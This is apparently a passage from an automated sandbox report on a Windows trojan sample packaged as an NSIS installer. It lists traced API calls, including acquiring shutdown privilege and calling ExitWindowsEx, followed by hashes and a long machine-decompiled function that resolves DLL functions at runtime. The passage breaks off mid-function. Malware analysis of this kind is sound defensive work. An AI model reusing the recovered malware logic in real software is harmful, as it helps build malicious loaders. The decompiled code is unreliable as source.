                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                          • OleInitialize.OLE32(00000000), ref: 00403527
                                                          • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                          • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                            • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                            • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                            • Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,74B5FA90), ref: 00403B50
                                                            • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                            • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                            • Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
                                                            • Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4
                                                            • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002D4,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                            • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
                                                          • ExitProcess.KERNEL32 ref: 004037C6
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
                                                          • ExitProcess.KERNEL32 ref: 00403968
                                                            • Part of subcall function 00405969: MessageBoxIndirectA.USER32(0040A230), ref: 004059C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                          • String ID: "$"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 538718688-1620236679
                                                          • Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                          • Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
                                                          • Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                          • Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E740D1A98() {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				CHAR* _v24;
                                                          				CHAR* _v28;
                                                          				signed int _v32;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				CHAR* _v48;
                                                          				signed int _v52;
                                                          				void* _v56;
                                                          				intOrPtr _v60;
                                                          				CHAR* _t207;
                                                          				signed int _t210;
                                                          				void* _t212;
                                                          				void* _t214;
                                                          				CHAR* _t216;
                                                          				void* _t224;
                                                          				struct HINSTANCE__* _t225;
                                                          				struct HINSTANCE__* _t226;
                                                          				struct HINSTANCE__* _t228;
                                                          				signed short _t230;
                                                          				struct HINSTANCE__* _t233;
                                                          				struct HINSTANCE__* _t235;
                                                          				void* _t236;
                                                          				char* _t237;
                                                          				void* _t248;
                                                          				signed char _t249;
                                                          				signed int _t250;
                                                          				void* _t254;
                                                          				struct HINSTANCE__* _t256;
                                                          				void* _t257;
                                                          				signed int _t259;
                                                          				intOrPtr _t260;
                                                          				char* _t263;
                                                          				signed int _t268;
                                                          				signed int _t271;
                                                          				signed int _t273;
                                                          				void* _t276;
                                                          				void* _t280;
                                                          				struct HINSTANCE__* _t282;
                                                          				intOrPtr _t285;
                                                          				void _t286;
                                                          				signed int _t287;
                                                          				signed int _t299;
                                                          				signed int _t300;
                                                          				intOrPtr _t303;
                                                          				void* _t304;
                                                          				signed int _t308;
                                                          				signed int _t311;
                                                          				signed int _t314;
                                                          				signed int _t315;
                                                          				signed int _t316;
                                                          				intOrPtr _t319;
                                                          				intOrPtr* _t320;
                                                          				CHAR* _t321;
                                                          				CHAR* _t323;
                                                          				CHAR* _t324;
                                                          				struct HINSTANCE__* _t325;
                                                          				void* _t327;
                                                          				signed int _t328;
                                                          				void* _t329;
                                                          
                                                          				_t282 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				_v40 = 0;
                                                          				_t329 = 0;
                                                          				_v52 = 0;
                                                          				_v44 = 0;
                                                          				_t207 = E740D1215();
                                                          				_v24 = _t207;
                                                          				_v28 = _t207;
                                                          				_v48 = E740D1215();
                                                          				_t320 = E740D123B();
                                                          				_v56 = _t320;
                                                          				_v12 = _t320;
                                                          				while(1) {
                                                          					_t210 = _v32;
                                                          					_v60 = _t210;
                                                          					if(_t210 != _t282 && _t329 == _t282) {
                                                          						break;
                                                          					}
                                                          					_t319 =  *_t320;
                                                          					_t285 = _t319;
                                                          					_t212 = _t285 - _t282;
                                                          					if(_t212 == 0) {
                                                          						_t37 =  &_v32;
                                                          						 *_t37 = _v32 | 0xffffffff;
                                                          						__eflags =  *_t37;
                                                          						L20:
                                                          						_t214 = _v60 - _t282;
                                                          						if(_t214 == 0) {
                                                          							 *_v28 =  *_v28 & 0x00000000;
                                                          							__eflags = _t329 - _t282;
                                                          							if(_t329 == _t282) {
                                                          								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
                                                          								_t329 = _t254;
                                                          								 *(_t329 + 0x810) = _t282;
                                                          								 *(_t329 + 0x814) = _t282;
                                                          							}
                                                          							_t286 = _v36;
                                                          							_t47 = _t329 + 8; // 0x8
                                                          							_t216 = _t47;
                                                          							_t48 = _t329 + 0x408; // 0x408
                                                          							_t321 = _t48;
                                                          							 *_t329 = _t286;
                                                          							 *_t216 =  *_t216 & 0x00000000;
                                                          							 *(_t329 + 0x808) = _t282;
                                                          							 *_t321 =  *_t321 & 0x00000000;
                                                          							_t287 = _t286 - _t282;
                                                          							__eflags = _t287;
                                                          							 *(_t329 + 0x80c) = _t282;
                                                          							 *(_t329 + 4) = _t282;
                                                          							if(_t287 == 0) {
                                                          								__eflags = _v28 - _v24;
                                                          								if(_v28 == _v24) {
                                                          									goto L42;
                                                          								}
                                                          								_t327 = 0;
                                                          								GlobalFree(_t329);
                                                          								_t329 = E740D12FE(_v24);
                                                          								__eflags = _t329 - _t282;
                                                          								if(_t329 == _t282) {
                                                          									goto L42;
                                                          								} else {
                                                          									goto L35;
                                                          								}
                                                          								while(1) {
                                                          									L35:
                                                          									_t248 =  *(_t329 + 0x14a0);
                                                          									__eflags = _t248 - _t282;
                                                          									if(_t248 == _t282) {
                                                          										break;
                                                          									}
                                                          									_t327 = _t329;
                                                          									_t329 = _t248;
                                                          									__eflags = _t329 - _t282;
                                                          									if(_t329 != _t282) {
                                                          										continue;
                                                          									}
                                                          									break;
                                                          								}
                                                          								__eflags = _t327 - _t282;
                                                          								if(_t327 != _t282) {
                                                          									 *(_t327 + 0x14a0) = _t282;
                                                          								}
                                                          								_t249 =  *(_t329 + 0x810);
                                                          								__eflags = _t249 & 0x00000008;
                                                          								if((_t249 & 0x00000008) == 0) {
                                                          									_t250 = _t249 | 0x00000002;
                                                          									__eflags = _t250;
                                                          									 *(_t329 + 0x810) = _t250;
                                                          								} else {
                                                          									_t329 = E740D1534(_t329);
                                                          									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
                                                          								}
                                                          								goto L42;
                                                          							} else {
                                                          								_t299 = _t287 - 1;
                                                          								__eflags = _t299;
                                                          								if(_t299 == 0) {
                                                          									L31:
                                                          									lstrcpyA(_t216, _v48);
                                                          									L32:
                                                          									lstrcpyA(_t321, _v24);
                                                          									goto L42;
                                                          								}
                                                          								_t300 = _t299 - 1;
                                                          								__eflags = _t300;
                                                          								if(_t300 == 0) {
                                                          									goto L32;
                                                          								}
                                                          								__eflags = _t300 != 1;
                                                          								if(_t300 != 1) {
                                                          									goto L42;
                                                          								}
                                                          								goto L31;
                                                          							}
                                                          						} else {
                                                          							if(_t214 == 1) {
                                                          								_t256 = _v16;
                                                          								if(_v40 == _t282) {
                                                          									_t256 = _t256 - 1;
                                                          								}
                                                          								 *(_t329 + 0x814) = _t256;
                                                          							}
                                                          							L42:
                                                          							_v12 = _v12 + 1;
                                                          							_v28 = _v24;
                                                          							L59:
                                                          							if(_v32 != 0xffffffff) {
                                                          								_t320 = _v12;
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          					}
                                                          					_t257 = _t212 - 0x23;
                                                          					if(_t257 == 0) {
                                                          						__eflags = _t320 - _v56;
                                                          						if(_t320 <= _v56) {
                                                          							L17:
                                                          							__eflags = _v44 - _t282;
                                                          							if(_v44 != _t282) {
                                                          								L43:
                                                          								_t259 = _v32 - _t282;
                                                          								__eflags = _t259;
                                                          								if(_t259 == 0) {
                                                          									_t260 = _t319;
                                                          									while(1) {
                                                          										__eflags = _t260 - 0x22;
                                                          										if(_t260 != 0x22) {
                                                          											break;
                                                          										}
                                                          										_t320 = _t320 + 1;
                                                          										__eflags = _v44 - _t282;
                                                          										_v12 = _t320;
                                                          										if(_v44 == _t282) {
                                                          											_v44 = 1;
                                                          											L162:
                                                          											_v28 =  &(_v28[1]);
                                                          											 *_v28 =  *_t320;
                                                          											L58:
                                                          											_t328 = _t320 + 1;
                                                          											__eflags = _t328;
                                                          											_v12 = _t328;
                                                          											goto L59;
                                                          										}
                                                          										_t260 =  *_t320;
                                                          										_v44 = _t282;
                                                          									}
                                                          									__eflags = _t260 - 0x2a;
                                                          									if(_t260 == 0x2a) {
                                                          										_v36 = 2;
                                                          										L57:
                                                          										_t320 = _v12;
                                                          										_v28 = _v24;
                                                          										_t282 = 0;
                                                          										__eflags = 0;
                                                          										goto L58;
                                                          									}
                                                          									__eflags = _t260 - 0x2d;
                                                          									if(_t260 == 0x2d) {
                                                          										L151:
                                                          										_t303 =  *_t320;
                                                          										__eflags = _t303 - 0x2d;
                                                          										if(_t303 != 0x2d) {
                                                          											L154:
                                                          											_t263 = _t320 + 1;
                                                          											__eflags =  *_t263 - 0x3a;
                                                          											if( *_t263 != 0x3a) {
                                                          												goto L162;
                                                          											}
                                                          											__eflags = _t303 - 0x2d;
                                                          											if(_t303 == 0x2d) {
                                                          												goto L162;
                                                          											}
                                                          											_v36 = 1;
                                                          											L157:
                                                          											_v12 = _t263;
                                                          											__eflags = _v28 - _v24;
                                                          											if(_v28 <= _v24) {
                                                          												 *_v48 =  *_v48 & 0x00000000;
                                                          											} else {
                                                          												 *_v28 =  *_v28 & 0x00000000;
                                                          												lstrcpyA(_v48, _v24);
                                                          											}
                                                          											goto L57;
                                                          										}
                                                          										_t263 = _t320 + 1;
                                                          										__eflags =  *_t263 - 0x3e;
                                                          										if( *_t263 != 0x3e) {
                                                          											goto L154;
                                                          										}
                                                          										_v36 = 3;
                                                          										goto L157;
                                                          									}
                                                          									__eflags = _t260 - 0x3a;
                                                          									if(_t260 != 0x3a) {
                                                          										goto L162;
                                                          									}
                                                          									goto L151;
                                                          								}
                                                          								_t268 = _t259 - 1;
                                                          								__eflags = _t268;
                                                          								if(_t268 == 0) {
                                                          									L80:
                                                          									_t304 = _t285 + 0xffffffde;
                                                          									__eflags = _t304 - 0x55;
                                                          									if(_t304 > 0x55) {
                                                          										goto L57;
                                                          									}
                                                          									switch( *((intOrPtr*)(( *(_t304 + 0x740d2259) & 0x000000ff) * 4 +  &M740D21CD))) {
                                                          										case 0:
                                                          											__eax = _v24;
                                                          											__edi = _v12;
                                                          											while(1) {
                                                          												__edi = __edi + 1;
                                                          												_v12 = __edi;
                                                          												__cl =  *__edi;
                                                          												__eflags = __cl - __dl;
                                                          												if(__cl != __dl) {
                                                          													goto L132;
                                                          												}
                                                          												L131:
                                                          												__eflags =  *(__edi + 1) - __dl;
                                                          												if( *(__edi + 1) != __dl) {
                                                          													L136:
                                                          													 *__eax =  *__eax & 0x00000000;
                                                          													__eax = E740D1224(_v24);
                                                          													__ebx = __eax;
                                                          													goto L97;
                                                          												}
                                                          												L132:
                                                          												__eflags = __cl;
                                                          												if(__cl == 0) {
                                                          													goto L136;
                                                          												}
                                                          												__eflags = __cl - __dl;
                                                          												if(__cl == __dl) {
                                                          													__edi = __edi + 1;
                                                          													__eflags = __edi;
                                                          												}
                                                          												__cl =  *__edi;
                                                          												 *__eax =  *__edi;
                                                          												__eax = __eax + 1;
                                                          												__edi = __edi + 1;
                                                          												_v12 = __edi;
                                                          												__cl =  *__edi;
                                                          												__eflags = __cl - __dl;
                                                          												if(__cl != __dl) {
                                                          													goto L132;
                                                          												}
                                                          												goto L131;
                                                          											}
                                                          										case 1:
                                                          											_v8 = 1;
                                                          											goto L57;
                                                          										case 2:
                                                          											_v8 = _v8 | 0xffffffff;
                                                          											goto L57;
                                                          										case 3:
                                                          											_v8 = _v8 & 0x00000000;
                                                          											_v20 = _v20 & 0x00000000;
                                                          											_v16 = _v16 + 1;
                                                          											goto L85;
                                                          										case 4:
                                                          											__eflags = _v20;
                                                          											if(_v20 != 0) {
                                                          												goto L57;
                                                          											}
                                                          											_v12 = _v12 - 1;
                                                          											__ebx = E740D1215();
                                                          											 &_v12 = E740D1A36( &_v12);
                                                          											__eax = E740D1429(__edx, __eax, __edx, __ebx);
                                                          											goto L97;
                                                          										case 5:
                                                          											L105:
                                                          											_v20 = _v20 + 1;
                                                          											goto L57;
                                                          										case 6:
                                                          											_push(7);
                                                          											goto L123;
                                                          										case 7:
                                                          											_push(0x19);
                                                          											goto L143;
                                                          										case 8:
                                                          											__eax = 0;
                                                          											__eax = 1;
                                                          											__eflags = 1;
                                                          											goto L107;
                                                          										case 9:
                                                          											_push(0x15);
                                                          											goto L143;
                                                          										case 0xa:
                                                          											_push(0x16);
                                                          											goto L143;
                                                          										case 0xb:
                                                          											_push(0x18);
                                                          											goto L143;
                                                          										case 0xc:
                                                          											__eax = 0;
                                                          											__eax = 1;
                                                          											__eflags = 1;
                                                          											goto L118;
                                                          										case 0xd:
                                                          											__eax = 0;
                                                          											__eax = 1;
                                                          											__eflags = 1;
                                                          											goto L109;
                                                          										case 0xe:
                                                          											__eax = 0;
                                                          											__eax = 1;
                                                          											__eflags = 1;
                                                          											goto L111;
                                                          										case 0xf:
                                                          											__eax = 0;
                                                          											__eax = 1;
                                                          											__eflags = 1;
                                                          											goto L122;
                                                          										case 0x10:
                                                          											__eax = 0;
                                                          											__eax = 1;
                                                          											__eflags = 1;
                                                          											goto L113;
                                                          										case 0x11:
                                                          											_push(3);
                                                          											goto L123;
                                                          										case 0x12:
                                                          											_push(0x17);
                                                          											L143:
                                                          											_pop(__ebx);
                                                          											goto L98;
                                                          										case 0x13:
                                                          											__eax =  &_v12;
                                                          											__eax = E740D1A36( &_v12);
                                                          											__ebx = __eax;
                                                          											__ebx = __eax + 1;
                                                          											__eflags = __ebx - 0xb;
                                                          											if(__ebx < 0xb) {
                                                          												__ebx = __ebx + 0xa;
                                                          											}
                                                          											goto L97;
                                                          										case 0x14:
                                                          											__ebx = 0xffffffff;
                                                          											goto L98;
                                                          										case 0x15:
                                                          											__eax = 0;
                                                          											__eflags = 0;
                                                          											goto L116;
                                                          										case 0x16:
                                                          											__ecx = 0;
                                                          											__eflags = 0;
                                                          											goto L91;
                                                          										case 0x17:
                                                          											__eax = 0;
                                                          											__eax = 1;
                                                          											__eflags = 1;
                                                          											goto L120;
                                                          										case 0x18:
                                                          											_t270 =  *(_t329 + 0x814);
                                                          											__eflags = _t270 - _v16;
                                                          											if(_t270 > _v16) {
                                                          												_v16 = _t270;
                                                          											}
                                                          											_v8 = _v8 & 0x00000000;
                                                          											_v20 = _v20 & 0x00000000;
                                                          											_v36 - 3 = _t270 - (_v36 == 3);
                                                          											if(_t270 != _v36 == 3) {
                                                          												L85:
                                                          												_v40 = 1;
                                                          											}
                                                          											goto L57;
                                                          										case 0x19:
                                                          											L107:
                                                          											__ecx = 0;
                                                          											_v8 = 2;
                                                          											__ecx = 1;
                                                          											goto L91;
                                                          										case 0x1a:
                                                          											L118:
                                                          											_push(5);
                                                          											goto L123;
                                                          										case 0x1b:
                                                          											L109:
                                                          											__ecx = 0;
                                                          											_v8 = 3;
                                                          											__ecx = 1;
                                                          											goto L91;
                                                          										case 0x1c:
                                                          											L111:
                                                          											__ecx = 0;
                                                          											__ecx = 1;
                                                          											goto L91;
                                                          										case 0x1d:
                                                          											L122:
                                                          											_push(6);
                                                          											goto L123;
                                                          										case 0x1e:
                                                          											L113:
                                                          											_push(2);
                                                          											goto L123;
                                                          										case 0x1f:
                                                          											__eax =  &_v12;
                                                          											__eax = E740D1A36( &_v12);
                                                          											__ebx = __eax;
                                                          											__ebx = __eax + 1;
                                                          											goto L97;
                                                          										case 0x20:
                                                          											L116:
                                                          											_v52 = _v52 + 1;
                                                          											_push(3);
                                                          											_pop(__ecx);
                                                          											goto L91;
                                                          										case 0x21:
                                                          											L120:
                                                          											_push(4);
                                                          											L123:
                                                          											_pop(__ecx);
                                                          											L91:
                                                          											__edi = _v16;
                                                          											__edx =  *(0x740d305c + __ecx * 4);
                                                          											__eax =  ~__eax;
                                                          											asm("sbb eax, eax");
                                                          											_v40 = 1;
                                                          											__edi = _v16 << 5;
                                                          											__eax = __eax & 0x00008000;
                                                          											__edi = (_v16 << 5) + __esi;
                                                          											__eax = __eax | __ecx;
                                                          											__eflags = _v8;
                                                          											 *(__edi + 0x818) = __eax;
                                                          											if(_v8 < 0) {
                                                          												L93:
                                                          												__edx = 0;
                                                          												__edx = 1;
                                                          												__eflags = 1;
                                                          												L94:
                                                          												__eflags = _v8 - 1;
                                                          												 *(__edi + 0x828) = __edx;
                                                          												if(_v8 == 1) {
                                                          													__eax =  &_v12;
                                                          													__eax = E740D1A36( &_v12);
                                                          													__eax = __eax + 1;
                                                          													__eflags = __eax;
                                                          													_v8 = __eax;
                                                          												}
                                                          												__eax = _v8;
                                                          												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
                                                          												_t136 = _v16 + 0x41; // 0x41
                                                          												_t136 = _t136 << 5;
                                                          												__eax = 0;
                                                          												__eflags = 0;
                                                          												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                          												 *((intOrPtr*)(__edi + 0x830)) = 0;
                                                          												 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                                          												L97:
                                                          												__eflags = __ebx;
                                                          												if(__ebx == 0) {
                                                          													goto L57;
                                                          												}
                                                          												L98:
                                                          												__eflags = _v20;
                                                          												_v40 = 1;
                                                          												if(_v20 != 0) {
                                                          													L103:
                                                          													__eflags = _v20 - 1;
                                                          													if(_v20 == 1) {
                                                          														__eax = _v16;
                                                          														__eax = _v16 << 5;
                                                          														__eflags = __eax;
                                                          														 *(__eax + __esi + 0x82c) = __ebx;
                                                          													}
                                                          													goto L105;
                                                          												}
                                                          												_v16 = _v16 << 5;
                                                          												_t144 = __esi + 0x830; // 0x830
                                                          												__edi = (_v16 << 5) + _t144;
                                                          												__eax =  *__edi;
                                                          												__eflags = __eax - 0xffffffff;
                                                          												if(__eax <= 0xffffffff) {
                                                          													L101:
                                                          													__eax = GlobalFree(__eax);
                                                          													L102:
                                                          													 *__edi = __ebx;
                                                          													goto L103;
                                                          												}
                                                          												__eflags = __eax - 0x19;
                                                          												if(__eax <= 0x19) {
                                                          													goto L102;
                                                          												}
                                                          												goto L101;
                                                          											}
                                                          											__eflags = __edx;
                                                          											if(__edx > 0) {
                                                          												goto L94;
                                                          											}
                                                          											goto L93;
                                                          										case 0x22:
                                                          											goto L57;
                                                          									}
                                                          								}
                                                          								_t271 = _t268 - 1;
                                                          								__eflags = _t271;
                                                          								if(_t271 == 0) {
                                                          									_v16 = _t282;
                                                          									goto L80;
                                                          								}
                                                          								__eflags = _t271 != 1;
                                                          								if(_t271 != 1) {
                                                          									goto L162;
                                                          								}
                                                          								__eflags = _t285 - 0x6e;
                                                          								if(__eflags > 0) {
                                                          									_t308 = _t285 - 0x72;
                                                          									__eflags = _t308;
                                                          									if(_t308 == 0) {
                                                          										_push(4);
                                                          										L74:
                                                          										_pop(_t273);
                                                          										L75:
                                                          										__eflags = _v8 - 1;
                                                          										if(_v8 != 1) {
                                                          											_t96 = _t329 + 0x810;
                                                          											 *_t96 =  *(_t329 + 0x810) &  !_t273;
                                                          											__eflags =  *_t96;
                                                          										} else {
                                                          											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
                                                          										}
                                                          										_v8 = 1;
                                                          										goto L57;
                                                          									}
                                                          									_t311 = _t308 - 1;
                                                          									__eflags = _t311;
                                                          									if(_t311 == 0) {
                                                          										_push(0x10);
                                                          										goto L74;
                                                          									}
                                                          									__eflags = _t311 != 0;
                                                          									if(_t311 != 0) {
                                                          										goto L57;
                                                          									}
                                                          									_push(0x40);
                                                          									goto L74;
                                                          								}
                                                          								if(__eflags == 0) {
                                                          									_push(8);
                                                          									goto L74;
                                                          								}
                                                          								_t314 = _t285 - 0x21;
                                                          								__eflags = _t314;
                                                          								if(_t314 == 0) {
                                                          									_v8 =  ~_v8;
                                                          									goto L57;
                                                          								}
                                                          								_t315 = _t314 - 0x11;
                                                          								__eflags = _t315;
                                                          								if(_t315 == 0) {
                                                          									_t273 = 0x100;
                                                          									goto L75;
                                                          								}
                                                          								_t316 = _t315 - 0x31;
                                                          								__eflags = _t316;
                                                          								if(_t316 == 0) {
                                                          									_t273 = 1;
                                                          									goto L75;
                                                          								}
                                                          								__eflags = _t316 != 0;
                                                          								if(_t316 != 0) {
                                                          									goto L57;
                                                          								}
                                                          								_push(0x20);
                                                          								goto L74;
                                                          							} else {
                                                          								_v32 = _t282;
                                                          								_v36 = _t282;
                                                          								goto L20;
                                                          							}
                                                          						}
                                                          						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
                                                          						if( *((char*)(_t320 - 1)) != 0x3a) {
                                                          							goto L17;
                                                          						}
                                                          						__eflags = _v32 - _t282;
                                                          						if(_v32 == _t282) {
                                                          							goto L43;
                                                          						}
                                                          						goto L17;
                                                          					}
                                                          					_t276 = _t257 - 5;
                                                          					if(_t276 == 0) {
                                                          						__eflags = _v44 - _t282;
                                                          						if(_v44 != _t282) {
                                                          							goto L43;
                                                          						} else {
                                                          							__eflags = _v36 - 3;
                                                          							_v32 = 1;
                                                          							_v8 = _t282;
                                                          							_v20 = _t282;
                                                          							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                          							_v40 = _t282;
                                                          							goto L20;
                                                          						}
                                                          					}
                                                          					_t280 = _t276 - 1;
                                                          					if(_t280 == 0) {
                                                          						__eflags = _v44 - _t282;
                                                          						if(_v44 != _t282) {
                                                          							goto L43;
                                                          						} else {
                                                          							_v32 = 2;
                                                          							_v8 = _t282;
                                                          							_v20 = _t282;
                                                          							goto L20;
                                                          						}
                                                          					}
                                                          					if(_t280 != 0x16) {
                                                          						goto L43;
                                                          					} else {
                                                          						_v32 = 3;
                                                          						_v8 = 1;
                                                          						goto L20;
                                                          					}
                                                          				}
                                                          				GlobalFree(_v56);
                                                          				GlobalFree(_v24);
                                                          				GlobalFree(_v48);
                                                          				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
                                                          					L182:
                                                          					return _t329;
                                                          				} else {
                                                          					_t224 =  *_t329 - 1;
                                                          					if(_t224 == 0) {
                                                          						_t187 = _t329 + 8; // 0x8
                                                          						_t323 = _t187;
                                                          						__eflags =  *_t323;
                                                          						if( *_t323 != 0) {
                                                          							_t225 = GetModuleHandleA(_t323); // executed
                                                          							__eflags = _t225 - _t282;
                                                          							 *(_t329 + 0x808) = _t225;
                                                          							if(_t225 != _t282) {
                                                          								L171:
                                                          								_t192 = _t329 + 0x408; // 0x408
                                                          								_t324 = _t192;
                                                          								_t226 = E740D15C2( *(_t329 + 0x808), _t324);
                                                          								__eflags = _t226 - _t282;
                                                          								 *(_t329 + 0x80c) = _t226;
                                                          								if(_t226 == _t282) {
                                                          									__eflags =  *_t324 - 0x23;
                                                          									if( *_t324 == 0x23) {
                                                          										_t195 = _t329 + 0x409; // 0x409
                                                          										_t230 = E740D12FE(_t195);
                                                          										__eflags = _t230 - _t282;
                                                          										if(_t230 != _t282) {
                                                          											__eflags = _t230 & 0xffff0000;
                                                          											if((_t230 & 0xffff0000) == 0) {
                                                          												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								__eflags = _v52 - _t282;
                                                          								if(_v52 != _t282) {
                                                          									L178:
                                                          									_t324[lstrlenA(_t324)] = 0x41;
                                                          									_t228 = E740D15C2( *(_t329 + 0x808), _t324);
                                                          									__eflags = _t228 - _t282;
                                                          									if(_t228 != _t282) {
                                                          										L166:
                                                          										 *(_t329 + 0x80c) = _t228;
                                                          										goto L182;
                                                          									}
                                                          									__eflags =  *(_t329 + 0x80c) - _t282;
                                                          									L180:
                                                          									if(__eflags != 0) {
                                                          										goto L182;
                                                          									}
                                                          									L181:
                                                          									_t205 = _t329 + 4;
                                                          									 *_t205 =  *(_t329 + 4) | 0xffffffff;
                                                          									__eflags =  *_t205;
                                                          									goto L182;
                                                          								} else {
                                                          									__eflags =  *(_t329 + 0x80c) - _t282;
                                                          									if( *(_t329 + 0x80c) != _t282) {
                                                          										goto L182;
                                                          									}
                                                          									goto L178;
                                                          								}
                                                          							}
                                                          							_t233 = LoadLibraryA(_t323); // executed
                                                          							__eflags = _t233 - _t282;
                                                          							 *(_t329 + 0x808) = _t233;
                                                          							if(_t233 == _t282) {
                                                          								goto L181;
                                                          							}
                                                          							goto L171;
                                                          						}
                                                          						_t188 = _t329 + 0x408; // 0x408
                                                          						_t235 = E740D12FE(_t188);
                                                          						 *(_t329 + 0x80c) = _t235;
                                                          						__eflags = _t235 - _t282;
                                                          						goto L180;
                                                          					}
                                                          					_t236 = _t224 - 1;
